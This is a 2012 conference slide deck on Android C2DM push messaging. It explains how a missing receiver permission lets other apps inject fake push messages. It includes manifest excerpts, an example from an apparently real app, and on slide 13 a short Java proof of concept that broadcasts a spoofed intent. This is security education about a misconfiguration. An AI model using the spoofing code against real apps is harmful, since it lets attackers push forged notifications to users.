AC2DM For Security
•Download as PPTX, PDF•
0 likes•202 views
Talks about Google's Cloud to Device (C2D at the time this was written in 2012 - now known as Google Cloud Messaging) technology, and ways it can be misconfigured.
Recommended
More Related Content
Similar to AC2DM For Security
Similar to AC2DM For Security (20)
More from Jason Ross
Recently uploaded
Recently uploaded (20)
AC2DM For Security
- 2. Android C2DM Overview • Push notification for Android • Rides on Gtalk (XMPP) • Messages limited to 1024 bytes • Account limited to 200,000 messages per day
- 3. A confusing process Image taken from http://developer.cisco.com/web/cius-developer/blogroll/-/blogs/android-s-c2dm
- 6. Message Send
- 7. Parts of a Message Required • Registration ID – sent by client • Collapse key – used to avoid flooding • Auth token – header from client login auth Optional • Data - payload • Delay while idle - flag
- 8. Manifest Components <permission android:name="com.intrepidusgroup.c2dm.permission.C2D_MESSAGE“ android:protectionLevel="signature" /> <!– Required to receive C2D messages --> <uses-permission android:name="com.intrepidusgroup.c2dm.permission.C2D_MESSAGE" /> <!– Required to register and receive registration results --> <uses-permission android:name="com.google.android.c2dm.permission.RECEIVE" /> <!– Internet required <uses-permission android:name="android.permission.INTERNET" /> <application> <!-- Android C2DM registration receiver --> <receiver android:name=".c2dRegReceiver“ android:permission="com.google.android.c2dm.permission.SEND" > <intent-filter > <action android:name="com.google.android.c2dm.intent.REGISTRATION" ></action> <category android:name="com.intrepidusgroup.c2dm" /> </intent-filter> </receiver> <!-- Android C2DM message receiver --> <receiver android:name=".c2dMsgReceiver“ android:permission="com.google.android.c2dm.permission.SEND" > <intent-filter > <action android:name="com.google.android.c2dm.intent.RECEIVE" ></action> <category android:name="com.intrepidusgroup.c2dm" /> </intent-filter> </receiver> </application>
- 9. Real World <permission android:name="com.app.mobile.permission.C2D_MESSAGE" android:protectionLevel="signature" /> <uses-permission android:name="com.app.mobile.permission.C2D_MESSAGE" /> So far so good…
- 10. Real World <receiver android:name=".notifications.PushMsgReceiver" android:process=":notifications"> <intent-filter> <action android:name="com.google.android.c2dm.intent.RECEIVE" /> <category android:name="com.ebay.mobile" /> </intent-filter> <intent-filter> <action android:name="com.google.android.c2dm.intent.REGISTRATION" /> <category android:name="com.ebay.mobile" /> </intent-filter> </receiver> <!-- Only C2DM servers can send messages for the app. If permission is not set - any other app can generate it --> <receiver android:name=".C2DMReceiver" android:permission="com.google.android.c2dm.permission.SEND">
- 11. So… ZOMG!!
- 12. Example Push (seen in logcat) I/PushService( 3990): onHandleIntent: action=3, intent data=Bundle[{ itm=37524594341, push_action=3, title=message received from: jross, collapse_key=jrossig01, sound=m2mmsghdr.caf, evt=M2MMSGHDR, from=appid@gmail.com, usr=jross }]
- 13. Spoof (no cloud required) // declare the Intent final Intent sendC2DM = new Intent ("com.google.android.c2dm.intent.RECEIVE"); // set this as category com.app.mobile to match the intent-filter sendC2DM.addCategory("com.app.mobile"); // add the expected data elements sendC2DM.putExtra("itm", "37524594341"); sendC2DM.putExtra("push_action", "3"); sendC2DM.putExtra("title", "message recieved from: C2DSpoofer"); sendC2DM.putExtra("sound", "m2mmsghdr.caf"); sendC2DM.putExtra("evt", "M2MMSGHDR"); sendC2DM.putExtra("usr", send2usr); String collapse_key = randString.genString(rng, chars, 4); sendC2DM.putExtra("collapse_key", collapse_key); // send the message to the on-device push notification receiver sendBroadcast(sendC2DM);
- 14. What Happened? • App received a “C2D” message from another application installed on the device. • Because the permission wasn’t set correctly, it accepted the message as though it came from Google. • App displayed message notification, with the “malicious” payload intact.
- 15. Other Things We’ve Noticed • Messages that come in may not be accurately received by the activity they are sent to (see: demo). • If you have multiple devices, or multiple users on a single device, things may get tricky.
Editor's Notes
- registration_id = The registration ID retrieved from the Android application on the phone. Required. collapse_key = An arbitrary string that is used to collapse a group of like messages when the device is offline, so that only the last message gets sent to the client. This is intended to avoid sending too many messages to the phone when it comes back online. Note that since there is no guarantee of the order in which messages get sent, the "last" message may not actually be the last message sent by the application server. Required. data.<key>= Payload data, expressed as key-value pairs. If present, it will be included in the Intent as application data, with the <key>. There is no limit on the number of key/value pairs, though there is a limit on the total size of the message. Optional. delay_while_idle = If included, indicates that the message should not be sent immediately if the device is idle. The server will wait for the device to become active, and then only the last message for each collapse_key value will be sent. Optional. Authorization = GoogleLogin auth=[AUTH_TOKEN]Header with a ClientLogin Auth token. The cookie must be associated with the ac2dm service. Required.
- This requires the application signature be present when the permission is used This restrict the C2D messages such that they must be sourced from Google in order for the application to process them. If the “android:permission” portion is missing, anyone can push messages of this type (Registration results) to the application. Same as #2, but for the actual C2D messages